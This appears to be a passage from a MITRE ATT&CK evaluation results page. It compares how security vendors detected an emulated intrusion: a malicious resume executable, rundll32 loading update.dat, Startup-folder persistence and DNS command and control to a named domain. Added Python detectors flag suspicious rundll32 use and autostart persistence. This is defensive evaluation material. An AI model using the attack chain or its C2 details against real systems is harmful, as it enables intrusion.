Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.
1.A.1 - User Execution
1.A.1 - Rundll32
1.A.1 - Scripting
1.B.1 - Registry Run Keys / Startup Folder
1.C.1 - Commonly Used Port
1.C.1 - Standard Application Layer Protocol
1.C.1 - Data Encoding
2.A.1 - System Network Configuration Discovery
2.A.2 - System Network Configuration Discovery
2.B.1 - System Owner/User Discovery
2.C.1 - Process Discovery
2.C.2 - Process Discovery
2.D.1 - System Service Discovery
2.D.2 - System Service Discovery
2.E.1 - System Information Discovery
2.E.2 - System Information Discovery
2.F.1 - Permission Groups Discovery
2.F.2 - Permission Groups Discovery
2.F.3 - Permission Groups Discovery
2.G.1 - Account Discovery
2.G.2 - Account Discovery
2.H.1 - Query Registry
3.A.1 - Bypass User Account Control
3.A.1 - Access Token Manipulation
3.B.1 - Process Discovery
3.C.1 - Process Injection
4.A.1 - Remote System Discovery
4.A.2 - Remote System Discovery
4.B.1 - System Network Configuration Discovery
4.C.1 - System Network Connections Discovery
5.A.1 - Credential Dumping
5.A.1 - Process Injection
5.A.2 - Credential Dumping
5.A.2 - Process Injection
5.B.1 - Access Token Manipulation
6.A.1 - Query Registry
6.B.1 - Commonly Used Port
6.B.1 - Standard Application Layer Protocol
6.B.1 - Multiband Communication
6.C.1 - Remote Desktop Protocol
7.A.1 - Create Account
7.A.1 - Graphical User Interface
7.A.1 - Account Discovery
7.B.1 - Remote File Copy
7.C.1 - Scheduled Task
8.A.1 - File and Directory Discovery
8.A.2 - File and Directory Discovery
8.B.1 - Process Discovery
8.C.1 - Input Capture
8.C.1 - Application Window Discovery
8.D.1 - Screen Capture
8.D.1 - Process Injection
9.A.1 - File and Directory Discovery
9.B.1 - Data from Network Shared Drive
9.B.1 - Exfiltration Over Command and Control Channel
10.A.1 - Registry Run Keys / Startup Folder
10.A.2 - Scheduled Task
10.B.1 - Valid Accounts
10.B.1 - Remote Desktop Protocol
11.A.1 - Scripting
11.B.1 - Commonly Used Port
11.B.1 - Standard Application Layer Protocol
11.B.1 - Standard Cryptographic Protocol
12.A.1 - System Network Configuration Discovery
12.A.2 - System Network Configuration Discovery
12.B.1 - System Owner/User Discovery
12.C.1 - Process Discovery
12.D.1 - System Service Discovery
12.E.1 - Scripting
12.E.1.1 - System Owner/User Discovery
12.E.1.2 - Permission Groups Discovery
12.E.1.3 - Password Policy Discovery
12.E.1.4.1 - File and Directory Discovery
12.E.1.4.2 - File and Directory Discovery
12.E.1.5 - Clipboard Data
12.E.1.6.1 - System Information Discovery
12.E.1.6.2 - System Information Discovery
12.E.1.7 - Query Registry
12.E.1.8 - System Service Discovery
12.E.1.9.1 - Network Share Discovery
12.E.1.9.2 - Network Share Discovery
12.E.1.10.1 - Security Software Discovery
12.E.1.10.2 - Security Software Discovery
12.E.1.11 - System Network Configuration Discovery
12.E.1.12 - System Network Connections Discovery
12.F.1 - Permission Groups Discovery
12.F.2 - Permission Groups Discovery
12.G.1 - Account Discovery
12.G.2 - Account Discovery
13.A.1 - Remote System Discovery
13.B.1 - System Network Connections Discovery
13.B.2 - System Network Connections Discovery
13.C.1 - Query Registry
14.A.1 - Bypass User Account Control
14.A.1 - Remote File Copy
14.A.1 - Standard Application Layer Protocol
14.A.1 - Commonly Used Port
15.A.1 - Input Capture
15.A.1 - Application Window Discovery
15.B.1 - Credentials in Files
16.A.1 - Brute Force
16.A.1 - Windows Admin Shares
16.B.1 - Valid Accounts
16.B.1 - Windows Admin Shares
16.B.1 - Brute Force
16.C.1 - Network Share Connection Removal
16.D.1 - Windows Admin Shares
16.D.1 - Valid Accounts
16.E.1 - Remote File Copy
16.F.1 - Command-Line Interface
16.G.1 - Remote File Copy
16.H.1 - System Service Discovery
16.I.1 - New Service
16.I.1 - Masquerading
16.J.1 - System Service Discovery
16.K.1 - File and Directory Discovery
16.L.1 - Service Execution
17.A.1 - System Service Discovery
17.A.1 - Query Registry
17.B.1 - File and Directory Permissions Modification
17.B.2 - File and Directory Permissions Modification
17.C.1 - Accessibility Features
18.A.1 - File and Directory Discovery
18.B.1 - Data Staged
18.B.1 - Data from Network Shared Drive
19.A.1 - Masquerading
19.A.1 - Remote File Copy
19.B.1 - Data Compressed
19.B.1 - Data Encrypted
19.B.1 - Masquerading
19.C.1 - Exfiltration Over Alternative Protocol
19.D.1 - File Deletion
19.D.2 - File Deletion
20.A.1 - Accessibility Features
20.A.1 - Remote Desktop Protocol
20.B.1 - System Owner/User Discovery
Comprehensive Results

1.A.1 User Execution

Procedure: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

Columns: Vendor, Detection Type, Detection Notes
Carbon Black
Telemetry
Telemetry within the process tree showed Resume Viewer.exe running along with its children. [1] [2]
General Behavior
A General Behavior alert was generated indicating that the user Debbie executed Resume Viewer.exe. This alert had a severity score of 51/100 and was based upon "Newly Executed Applications". [1] [2]
CrowdStrike
Telemetry
Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1]
General Behavior
A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious. [1]
Cybereason
General Behavior
A General Behavior alert was generated based on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe was executed and running as a process. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. The provided screenshot was captured later in the evaluation and includes additional information appended to explorer.exe not relevant to this procedure. [1] [2] [3]
General Behavior
A General Behavior alert was generated based on the identification of Resume Viewer.exe as unknown malware by the Anti-Malware engine. Vendor stated that the capability would have prevented the execution of Resume Viewer.exe. [1] [2] [3]
Endgame
General Behavior
A General Behavior alert was generated for Malicious File Detection on the execution of Resume Viewer.exe. [1] [2]
Telemetry (Tainted)
Telemetry showed events surrounding the Resume Viewer.exe event to indicate execution (tainted by a parent Malicious File Detection). [1] [2]
FireEye
Telemetry
Telemetry showed Resume Viewer.exe executing with a parent process of explorer.exe. [1] [2]
General Behavior (Configuration Change)
A General Behavior alert was generated for the Resume Viewer.exe file due to it being labeled as malicious by a machine learning engine. The alert was generated after a configuration change of the file size limit for the machine learning engine. The vendor reported that this file would have been quarantined and prevented from executing. The scan type used to produce this alert is On-access, which means the scan occurs on file writes and executions. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated for the execution of a rare file (Resume Viewer.exe). The vendor reported that the file would have been prevented from executing. Screenshot is unavailable due to sensitivity of alert logic. [1]
Telemetry
Telemetry showed the execution of Resume Viewer.exe as a process. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe was executed. The telemetry was tainted by the parent Script File Created alert. [1]
McAfee
Telemetry
Telemetry showed that Resume Viewer.exe was executed by Explorer.exe by user Debbie. [1]
Microsoft
Telemetry
Telemetry showed the user execution sequence of Resume Viewer.exe with multiple files written and subsequently executed. Resume Viewer.exe was audited by Exploit Guard and the vendor stated that the audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed that Resume Viewer.exe was executed and running as a process owned by user Debbie. [1]
RSA
Telemetry
Telemetry showed execution of Resume Viewer.exe. [1]
SentinelOne
General Behavior
A General Behavior alert was generated because static analysis of the file by the DFI engine marked it as suspicious; this created a story (group ID) by which subsequent linked events are tainted. [1] [2]
Telemetry
Telemetry showed Resume Viewer.exe execution with subsequent file writes and execution. [1] [2]
1.A.1 Rundll32

Carbon Black
Enrichment
The capability enriched the rundll32.exe execution with the correct ATT&CK Technique (T1085, which corresponds to the Rundll32 Technique). [1] [2]
Telemetry
Telemetry within the process tree showed the Resume Viewer.exe execution sequence and rundll32.exe executing. [1] [2]
CrowdStrike
Specific Behavior
A Specific Behavior alert was generated due to rundll32 launching a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion). [1] [2]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating rundll32 executing update.dat was suspicious. OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry within the rundll32.exe injection alert also showed full command-line arguments of rundll32.exe executing update.dat. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. For most alerts in the user interface, the telemetry behind them is separately available in the capability and counted as a separate detection. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for injected shellcode by a compromised legitimate process (rundll32.exe). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection) and was tainted by a parent alert on rundll32.exe injection. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for rundll32.exe launching a module in a temporary folder and injecting shell code into a victim process. The alert was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert called RunDLL32 with Suspicious DLL Location was generated due to rundll32.exe running update.dat. The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution) and was tainted by a parent Malicious File Detection alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed rundll32.exe running update.dat. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3]
FireEye
Enrichment
The capability enriched rundll32.exe with an alert for Rundll32 Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution). [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified use of rundll32.exe to execute update.dat with command-line arguments. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
Telemetry
Telemetry showed rundll32.exe executing update.dat. [1]
General Behavior
A General Behavior alert was generated for an unusual call to rundll32.exe. Screenshot is unavailable due to sensitivity of alert logic. [1]
Specific Behavior
A Specific Behavior alert was generated for rundll32.exe executing in a way typical for rundll32 injections. Screenshot is unavailable due to sensitivity of alert logic. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed that cmd.exe created the rundll32.exe process that started update.dat. The telemetry was tainted by the parent Script File Created alert. [1]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing update.dat via rundll32.exe. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3]
Specific Behavior
Specific Behavior alerts were generated based on suspicious indicators that a "Loaded non-DLL and non-CPL file with specified parameters via rundll32." The alerts were tagged with the correct ATT&CK Tactics (Defense Evasion, Execution) and Technique (Rundll32). [1] [2] [3]
Microsoft
Telemetry
Telemetry showed the execution sequence for rundll32.exe running update.dat. [1] [2]
General Behavior (Delayed)
A delayed General Behavior alert was generated for a low-reputation DLL loaded by a signed executable due to rundll32.exe execution of update.dat. [1] [2]
Palo Alto Networks
Specific Behavior (Tainted)
Specific Behavior alerts were generated for rundll32. The alerts were tagged with the correct ATT&CK Technique (Rundll32) and were tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4]
General Behavior (Tainted)
A General Behavior alert was generated based on rundll32.exe executing update.dat, identified as a suspicious DLL and malware. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated the capability would have prevented execution of update.dat. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed cmd.exe launching rundll32.exe. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed rundll32.exe executing as a result of Resume Viewer.exe running. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1]
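Several of the notes above (Endgame's "RunDLL32 with Suspicious DLL Location", McAfee's "Loaded non-DLL and non-CPL file ... via rundll32") describe the same two signals: rundll32.exe was handed a module that is not a .dll or .cpl, and that module lived in a user-writable directory. The following is an added example of that logic run over constructed process-creation events; it is not code from MITRE or from any evaluated vendor. The event fields, the directory list and the sample events are assumptions made for illustration. rundll32 hands the module path straight to LoadLibrary, so the extension means nothing to it, which is exactly why a .dat module is worth an alert.

```python
"""Flag rundll32.exe loading a module that is not a .dll/.cpl, or that lives
in a user-writable directory, over constructed process-creation events.

Added example for this page; not MITRE's or any evaluated vendor's code.
The event fields, the directory list and SAMPLE_EVENTS are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Directories a standard user can write to (assumed list, extend as needed).
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\users\\public\\",
                 "\\programdata\\", "\\downloads\\")

# rundll32 syntax: rundll32.exe <module>[,<entrypoint>] [args]. The launcher
# token may be a quoted full path; the module may be quoted too.
_RUNDLL32_ARG = re.compile(
    r'^\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def rundll32_module(command_line: str) -> Optional[str]:
    """Return the module path rundll32 was asked to load, or None."""
    m = _RUNDLL32_ARG.match(command_line)
    if not m:
        return None
    token = m.group(1) or m.group(2)
    return token.split(",", 1)[0]        # drop the ",EntryPoint" suffix


def assess_rundll32(ev: ProcessEvent) -> Optional[dict]:
    """Return an alert for a suspicious rundll32 launch, else None."""
    if ntpath.basename(ev.image).lower() != "rundll32.exe":
        return None
    module = rundll32_module(ev.command_line)
    if not module:
        return None
    reasons = []
    ext = ntpath.splitext(module)[1].lower()
    if ext not in (".dll", ".cpl"):
        reasons.append(f"non-DLL/CPL module ({ext or 'no extension'})")
    if any(d in module.lower() for d in USER_WRITABLE):
        reasons.append("module in user-writable directory")
    if not reasons:
        return None
    return {
        "host": ev.host,
        "parent": ntpath.basename(ev.parent_image),
        "module": module,
        "reasons": reasons,
        "technique": "T1085 Rundll32 (T1218.011 in current ATT&CK)",
        "tactics": ["Defense Evasion", "Execution"],
    }


def scan(events: List[ProcessEvent]) -> List[dict]:
    return [a for a in map(assess_rundll32, events) if a]


# Constructed events: the evaluation's update.dat launch, a benign Control
# Panel launch, a DLL loaded from a roaming profile, and an unrelated cmd.exe.
SAMPLE_EVENTS = [
    ProcessEvent("Nimda", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Debbie\AppData\Local\Temp\update.dat,#1"),
    ProcessEvent("Nimda", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'),
    ProcessEvent("Nimda", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe "C:\Users\Debbie\AppData\Roaming\helper.dll",Start'),
    ProcessEvent("Nimda", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\cmd.exe", r"cmd.exe /c ipconfig /all"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The extension check alone will miss a payload that is simply renamed to .dll, which is why the location check is kept as an independent reason; a signed Windows binary loading a module out of a user profile is the stronger of the two signals. T1085 is the identifier used throughout this page; ATT&CK later folded it into T1218.011.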
1.A.1 Scripting

Carbon Black
Enrichment
The capability enriched the cmd.exe execution with the correct ATT&CK Technique (T1064 - Scripting). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the process tree showed cmd.exe executing the pdfhelper.cmd script. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry
Telemetry showed pdfhelper.cmd being executed by cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe launching pdfhelper.cmd. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed cmd.exe executing pdfhelper.cmd as well as pdfhelper.cmd spawning as a child process of Resume Viewer.exe. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5] [6] [7]
FireEye
Telemetry
Telemetry showed Resume Viewer.exe spawning the child process cmd.exe to launch pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running pdfhelper.cmd) has been tagged for monitoring because its parent process has a detection (Resume Viewer.exe). Screenshot is unavailable due to sensitivity of alert logic. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed pdfhelper.cmd was executed by cmd.exe. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe created cmd.exe, which ran the script pdfhelper.cmd. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed pdfhelper.cmd being executed by cmd.exe. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry within a process tree showed the child cmd.exe process running the script pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe launching pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed the execution sequence of Resume Viewer.exe executing cmd.exe, which executed rundll32.exe (the pdfhelper.cmd script was not shown). [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing the pdfhelper.cmd script. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2] [3] [4]
1.B.1 Registry Run Keys / Startup Folder

Carbon Black
Telemetry
Telemetry showed filemods indicating the creation and file write of autoupdate.bat to the Startup folder. [1] [2] [3]
Enrichment
The capability enriched cmd.exe with the correct ATT&CK Technique (T1060 - Registry Run Keys/Start Folder). [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data may be indicative of modifications to the folder. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe rewriting autoupdate.bat to the user Debbie's Startup folder. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3] [4]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert called "Detected Persistence - Start Folder Persistence" was generated due to cmd.exe writing autoupdate.bat to the Startup folder. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Start Folder) and Tactic (Persistence). The Specific Behavior alert was tainted by a parent Malicious File Detection alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed autoupdate.bat written to the Start Menu. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the backdoor persisted by executing autoupdate.bat at system start due to its presence in the Startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed autoupdate.bat being written to the Startup folder. The alert mapped to two ATT&CK Techniques (T1059 - Command-Line Interface and T1105 - Remote File Copy), but they were not directly related to the Registry Run Keys / Startup Folder Technique under test in this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched the file write of autoupdate.bat to the Startup folder by categorizing it as Persistence. [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from within the Startup folder. [1] [2] [3]
GoSecure
Telemetry
Telemetry showed that autoupdate.bat was created in the Startup folder. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for "An exe/bat/lnk/dll file has been copied or renamed in the Windows Startup Folder" for persistence based on pdfhelper.cmd. The alert was tagged with the correct ATT&CK Tactic (Persistence) and Technique (Registry Run Keys / Start Folder). [1] [2]
Microsoft
Telemetry
Telemetry showed the execution sequence for Resume Viewer.exe writing autoupdate.bat to Debbie's Startup folder to establish persistence. [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed autoupdate.bat being moved to the user Debbie's Startup folder. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
Enrichment (Configuration Change, Tainted)
The capability enriched a file being created in the Startup folder with the correct ATT&CK Technique (Registry Run Keys / Start Folder). The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The logic to produce the enrichment was configured after the start of the evaluation so it is identified as a config change. [1] [2] [3]
RSA
Telemetry
Telemetry showed a cmd.exe "rename to executable" event for autoupdate.bat in the Startup folder. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry on actions performed from Resume Viewer.exe showed autoupdate.bat being written to the Startup Folder. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2] [3]
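The vendor rules quoted above reduce to one check: a file with an executable or script extension landing in a Startup folder, whether by write, copy or rename (RSA's "rename to executable" event and Palo Alto's "moved" both describe the same outcome). The block below is an added example of that check, with the Run/RunOnce registry half of the technique name included as well even though this procedure only used the folder; it is not code from MITRE or any evaluated vendor. The event shapes, the extension list (the page's vendor rule names exe/bat/lnk/dll; cmd/vbs/js/ps1/hta/scr are added here) and the sample events are assumptions.

```python
"""Flag persistence via the Startup folder and Run/RunOnce registry values
over constructed file and registry events.

Added example for this page; not MITRE's or any vendor's code. Event
shapes, AUTORUN_EXTS and SAMPLE_EVENTS are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Both the per-user (AppData\Roaming\...) and all-users (ProgramData\...)
# Startup folders end in this suffix, so one suffix match covers both.
STARTUP_FILE_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+$", re.IGNORECASE)
RUN_KEY_RE = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\(?:Run|RunOnce)$",
    re.IGNORECASE)
AUTORUN_EXTS = {".exe", ".bat", ".cmd", ".lnk", ".dll", ".vbs", ".js",
                ".ps1", ".hta", ".scr"}


@dataclass(frozen=True)
class FileEvent:
    host: str
    process: str
    action: str          # "create", "write" or "rename" (target of the rename)
    target_path: str


@dataclass(frozen=True)
class RegistryEvent:
    host: str
    process: str
    key: str
    value_name: str
    data: str


def assess_persistence(ev: Union[FileEvent, RegistryEvent]) -> Optional[dict]:
    """Return an alert dict when the event establishes an autostart, else None."""
    if isinstance(ev, FileEvent):
        if not STARTUP_FILE_RE.search(ev.target_path):
            return None
        ext = ntpath.splitext(ev.target_path)[1].lower()
        if ext not in AUTORUN_EXTS:
            return None          # e.g. desktop.ini is normal in that folder
        detail = f"{ev.action} of {ntpath.basename(ev.target_path)} in Startup folder"
    else:
        if not RUN_KEY_RE.search(ev.key.rstrip("\\")):
            return None
        detail = f"Run key value {ev.value_name!r} -> {ev.data}"
    return {
        "host": ev.host,
        "process": ntpath.basename(ev.process),
        "detail": detail,
        "technique": "T1060 Registry Run Keys / Startup Folder (T1547.001 in current ATT&CK)",
        "tactic": "Persistence",
    }


def scan(events) -> List[dict]:
    return [a for a in map(assess_persistence, events) if a]


STARTUP = r"C:\Users\Debbie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [  # constructed: the evaluation's rename plus benign noise
    FileEvent("Nimda", r"C:\Windows\System32\cmd.exe", "rename",
              STARTUP + r"\autoupdate.bat"),
    FileEvent("Nimda", r"C:\Windows\explorer.exe", "write", STARTUP + r"\desktop.ini"),
    FileEvent("Nimda", r"C:\Windows\System32\cmd.exe", "create",
              r"C:\Users\Debbie\Documents\notes.bat"),
    RegistryEvent("Nimda", r"C:\Windows\System32\reg.exe",
                  r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                  "Updater", r"C:\Users\Debbie\AppData\Local\Temp\update.dat"),
    RegistryEvent("Nimda", r"C:\Windows\explorer.exe",
                  r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
                  "Hidden", "1"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Matching on the rename target is what makes the RSA-style event count: a sensor that only watches file creation misses a script written elsewhere and moved into the folder afterwards. T1060 is the identifier used on this page; ATT&CK later folded it into T1547.001.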
1.C.1 Commonly Used Port

Carbon Black
Telemetry
Telemetry showed a network connection over UDP port 53. [1] [2] [3] [4] [5] [6]
CrowdStrike
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically). [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed port 53 command and control traffic. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
None
No detection capability demonstrated for this procedure, though DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry
Telemetry showed port 53 command and control traffic. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the use of UDP port 53 for DNS command and control traffic. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a scripting engine (rundll32.exe) making a network connection over DNS ports. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed port 53 command and control traffic. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3]
1.C.1 Standard Application Layer Protocol

Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3]
CrowdStrike
Specific Behavior
A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry in the event tree view showed DNS requests spawning from rundll32.exe to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5]
FireEye
Indicator of Compromise
An Indicator of Compromise alert was generated for the hardcoded DNS record name syntax in the DNS lookups for freegoogleadsenseinfo.com (C2 domain). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
